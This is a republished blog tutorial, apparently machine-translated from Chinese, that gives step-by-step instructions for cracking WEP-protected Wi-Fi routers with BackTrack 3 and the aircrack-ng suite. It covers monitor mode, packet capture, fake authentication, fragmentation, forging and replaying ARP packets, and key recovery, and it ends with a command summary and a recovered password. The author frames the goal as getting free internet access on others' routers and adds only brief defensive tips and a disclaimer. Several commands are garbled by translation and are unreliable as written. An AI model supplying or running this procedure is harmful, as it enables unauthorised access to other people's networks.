How to use a notebook to crack a Wireless Router password

Source: Internet
Author: User

Recently, many people have asked me how to crack the Wi-Fi password... It seems that everyone is interested in free things. Or, maybe I'm too swaying... Else...

Well, I will write a small tutorial. After reading this article, you should be able to crack most of the wireless router passwords. This tutorial is also designed to enhance your attention to wireless network security, there are also simple anti-cracking methods in the future.

 

Now, it's officially started.

First, you need the following tools:

Software:

① Backtrack 3 (bt3)

Bt3 has an optical disk, hard disk, and a USB flash disk. Since this can basically be engraved, I am too lazy to get those USB flash drives, hard disk versions, and I have carved a disc directly. Therefore, this tutorial uses the optical disk version.

:

U Disk: http://backtrack.unixheads.org/bt3final_usb.iso

Disc version: http://www.remote-exploit.org/cgi-bin/fileget? Version = bt3-cd

 

Hardware:

② A laptop or desktop with a wireless network card.

For a notebook, check your Nic type in the Device Manager. I use intel 3945abg. Most of the laptops on the market now use this Nic, this tutorial focuses on this network card. If it is not, it may be able to be cracked successfully, and I will not test it. The desktop wireless network card also supports bt3.

 

 

Figure 01-view NICs

 

③ The Rest Of The melon seeds, drinks or whatever you bring your own.

 

I have explained many tutorials on the Internet in detail about the preparations mentioned above. I have never done anything about the U disk or hard disk, So I skipped this part... If you have any questions, leave a message below.

 

Wait a few minutes after the disc is inserted and start up. There is a selection mode interface. Generally, the first option will enter the bt3 graphic interface. 02. If you cannot enter the option, enter the root account, password toor, then input startx. You can also enter it, but I have tested that my current cannot be entered. The answer I found online is that the video card is not supported (ATI 2400 XT)

If you cannot enter the first graph mode, select the fourth graph mode. If you cannot enter this mode, try every graph mode, that's the RP problem. Your current video card does not support...

 

Figure 02-after entering the page

 

Click a black and black display icon in the lower right corner to open a console. 03:

 

 

Figure 03-open the Console

At this time, you can start to enter the command.

① Ifconfig-

This is to view the current Nic information.-A shows all NICs. Without this parameter, the wireless Nic cannot be displayed. This command can view the MAC address of the current network card. The MAC address of the wireless network card is what we need, that is, six hexadecimal characters After hwaddr, the later 00 is not required. It should be prepared for ip6. 04.

 

Figure 04-view Nic Information

 

To avoid information leakage, I have hidden the last two bytes of my mac address and the Access Point (Access Point) to be cracked ~ Haha ~

We can see that the name of the wireless network adapter is wlan0, which is the name of the iwl3945 driver automatically loaded by bt3. This driver does not support subsequent cracking, so we need to change the driver.

 

② Modprobe-r iwl3945

Uninstall the current iwl3945 driver.

 

③ Modprobe ipwraw

Load the ipwraw driver, which can be used normally.

After loading the file, enter ifconfig-A and try again. Then wlan0 disappears and a wifi0, 05 is displayed. This is the name that ipwraw gave to our Nic. This name will be used multiple times later. At this time, you also need to remember your MAC address, it is best to create a text file on the desktop, and then copy it to facilitate subsequent command calls.

 

Figure 05-load the 3945 driver

 

④ Airomon-ng start wifi0

This command sets the wireless network card as the listening mode, because it is difficult to implement in windows, and Linux is open-source, so most hacker software is under the Linux platform, when I first started using bt3, I got stuck here because the iwl3945 driver could not use the listening mode. After the setting is successful, 06.

 

Figure 06-set the listening mode

 

⑤ Airodump-ng wifi0

Now that you want to crack it, you have to have a goal. This command is used to detect all the wireless network signals that can be searched currently. It includes information such as channel and signal strength. 07 after running.

 

Figure 07-view an AP

 

Several parameters are explained on the Internet, but they are not quite clear.

Bssid -- this is the MAC address of the router. I want to crack the following one. The signal above is too bad.

PWR-this is the signal strength, but it doesn't matter if my computer doesn't show up or doesn't show up. It doesn't impede subsequent cracking, as long as the signal is displayed well in windows.

Beacons -- this is the packet sent from the vro to the outside. It may be the SSID broadcast. I am not quite sure. If we see this data rising, it indicates that this AP is okay. Generally, it is 20 to 1 second ~ 30. If it is too slow, the attack may fail due to the signal.

# Data -- this data is the most important. This indicates a packet that can be used for cracking. Generally, this data reaches +, and the 64-bit WEP password can be cracked. What we need to do later is wait for him to reach 1 W. If the data grows slowly (increases by 1 in a few minutes), we have to use another method, namely packet sending attacks, this will be introduced later.

#/S -- data increase speed.

Ch-channel: there are 11 channels in total. We can see that the channel for the AP to be cracked is 11.

MB-the wireless speed is usually 54mb.

Cipher-encryption method. If it is WEP, it can be cracked in this way. If it is WPA/wpa2, it can only be cracked in a brute force manner. I still don't know how to crack it... When you crack all the passwords like 12345, 1234567890, you will feel that what you pay is totally out of proportion to what you get... Tat. Here we only consider WEP encryption.

Auth -- this should be the abbreviation of authorization, that is, authorization. I don't know what it is. The router may need to verify the Client permission to send packets to the client. It is empty now, and there will be a value later.

Essid-simply put, this is the name of the router.

In this step, we need to determine the router to be cracked and its MAC address. The data value increases rapidly, or the signal in Windows is better, or the PWR is relatively high, with priority. Similarly, you can write the MAC address to a text file.

 

⑥ Airodump-ng -- IVS-W God-C 11 wifi0

This command is used to detect the router packet sending of a channel and save the available package (that is, # data) to a file God. This God can be changed to your favorite name, but remember it...

Parameter,

-C refers to the Channel followed by the signal channel of the router to be cracked, that is, 11.

Wifi0 is the name of my Nic.

After entering this command, the window does not need to be closed. It needs to capture packets all the time, which is called Window 1.

 

At this time, we re-open a console, that is, the black box. Run the following command:

7aireplay-ng-1 0-a 00: 23: CD: 89: **-H 00-1f-3c-5b-** wifi0

-A is followed by the target MAC address.

-H is followed by the MAC address of the Local Wireless Nic.

Wifi0 is the name of the Local Wireless Network Adapter

 

This command is used to obtain authorization and test the simulated packet sending attack. I am not quite clear about the specific usage... It may be to test whether the attack can be carried out by sending packets.

The following message is displayed: Association successful

Then, the auth column value in the window above is changed to fig.

 

Figure 08-test connection

 

⑧ Aireplay-ng-5-B 00: 23: CD: 89: **-H 00-1f-3c-5b-** wifi0

Parameter

-5 is the mode used by the aireplay program.

-B follows the target MAC address.

-H is followed by the MAC address of the Local Wireless Nic.

Wifi0 is the name of the Local Wireless Network Adapter

 

In my understanding, this command is used to obtain a specific packet production attack source, and then use this attack source to initiate a packet attack. This step is the most difficult to succeed, often because of failure. If the data value of the AP you selected is still 0 after waiting for half a day, you can discard it. After entering the command, we start to capture the package. The following data will increase. 09. When a useful package is caught, it will ask you if you want to use this package, press enter and then OK.

However, the packets obtained often fail to be attacked. In this case, we have to wait and it will automatically start the next round of packet capture. Therefore, RP is required for cracking... Let's move the brothers with low RP ......

 

Figure 09-Get available packages

 

 

Figure 10-available packages

 

 

Figure 11-attack failure

 

Let's talk about why the data value stays at 0 or increases slowly. If the AP is connected to a client wirelessly, it sends more data and has a high chance of getting the available package. If there is no client connection, it does the work of constantly sending out the SSID broadcast. Simply put, it is to tell everyone that I am a vro and my name is ****, how big is my signal? Do I have a password. Such a package can be used to crack the password (that is, the data package) is rare. Generally, it is good to generate one of the 5000 packages...

 

While waiting, you can open another window and enter 9th commands

⑨ Aircrack-ng-B 00: 23: CD: 89: ** god-01.ivs

Parameter

-B follows the target MAC address.

 

This is the formal crack, where the god-01.ivs is the packet we capture, that is, the data package to save the file, if you use airodump packet capture multiple times, then you can go to the root directory to check the latest file name and change it accordingly. This program uses these captured data packets to calculate the password. 12 after the command is run.

 

Figure 12-failed to crack

 

We can see that the attack failed. There are only 34 IVS (data packages). It is strange not to fail. It is generally + before.

Among the 2nd windows, wait, and finally wait for a useful package. Success information 13

 

Figure 13-obtain the packages available for attack

 

After successful, the program will generate an XOR file fragment-0806-150830.xor, remember this, the next command to use.

Enter:

Required packetforge-ng-0-a 00: 23: CD: 89 :**: **-H 00-1f-3c-5b-**-K 255.255.%255-l 255.%255-y fragment-0806-150830.xor-W moon

Parameter

-A is followed by the target MAC address.

-H is followed by the MAC address of the local wireless network adapter.

-Y is the XOR file generated in the previous step.

-W is the generated ARP package file name. I have filled in moon, which can be changed and remember.

 

This command is used to forge an ARP packet for ARP attacks.

 

With the last command, let's make the vro struggling...

⑪ Aireplay-ng-2-r moon-x 512 wifi0

Moon is the ARP package file name saved in the previous step.

512 is an attack thread. Generally, 512 is enough. I am afraid that 1024 is too big.

Wifi0 is the network card name.

 

After entering this item, we can see that the data value in the 1st window has increased sharply, 14.

 

Figure 14-packet sending attack

 

As shown in the figure, the data growth rate is 361/s.

Then we will switch to the 3rd window, that is, the aircrack window. When the data reaches 5000, the system will automatically start cracking. If the data reaches 10000, the system will crack again. All of this happened very quickly.

 

Soon, the password came out, 15.

 

Figure 15-successful cracking

 

As shown in Figure 15, the password is 8264287788. In WEP, 64-bit encryption contains 5 ASCII codes or 10 hexadecimal characters. Therefore, we can switch to Windows and connect it with 8264287788. The signal is good!

 

Figure 16-wireless connection

 

[Summary]

Make a summary of all the commands used. The changes in [] are required for your convenience.

① Ifconfig-

② Modprobe-r iwl3945

③ Modprobe ipwraw

④ Airomon-ng start [Nic name]

⑤ Airodump-NG [network card name]

⑥ Airodump-ng -- IVS-W [data package file name]-C [Channel] [Nic name]

7aireplay-ng-1 0-A [target Mac]-H [Nic Mac] [Nic name]

⑧ Aireplay-ng-5-B [target Mac]-H [Nic Mac] [Nic name]

⑨ Aircrack-ng-B [target Mac] [data package file name]-0 *. IVS

Unzip packetforge-ng-0-A [target Mac]-H [Nic Mac]-k then 255.255.255.255-l 255.255.255-y [XOR file name in the previous step]-W [Attacker packet file name]

⑪ Aireplay-ng-2-R [attack package file name]-X [attack thread] [Nic name]

 

In this tutorial:

[Nic name] -- wifi0

[Data package file name] -- God

[Channel] -- 11

[Target Mac] -- 00: 23: CD: 89 :**:**

[Nic Mac] -- 00-1f-3c-5b -**-**

[XOR file name in the previous step] -- fragment-0806-150830.xor

[Attack package file name] -- moon

[Attack thread] -- 512

 

Then let's talk about how to prevent your AP from being cracked by hackers like me and then hit the Internet cafe.

 

① You can disable SSID broadcast so that other people cannot find your wireless signal.

② You can set WPA/wpa2 encryption. Currently, mainstream routers support this function. Why not?

③ You can change your SSID to Chinese. Although I have never tried it, it seems that it cannot be cracked on the Internet.

④ You can set the MAC address to bind, but you can view the valid MAC address and mask the Mac to crack it (thanks for the suggestions provided by the guys downstairs ~)

 

 

Now, the tutorial is over. If you have any questions, please follow the instructions.

I am also a cainiao. This tutorial is also made up of things and some of my own insights. It is inevitable that something is wrong. please correct me ~

Finally, I declared in Harmony:

This tutorial aims to popularize wireless network knowledge and enhance your understanding of wireless network security issues. I hope you will not do anything bad ~ I am not responsible for any consequences caused by using this method. Hey hey ~

 

This article from the csdn blog, reproduced please indicate the source: http://blog.csdn.net/sytzz/archive/2009/08/22/4473401.aspx

 

 

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.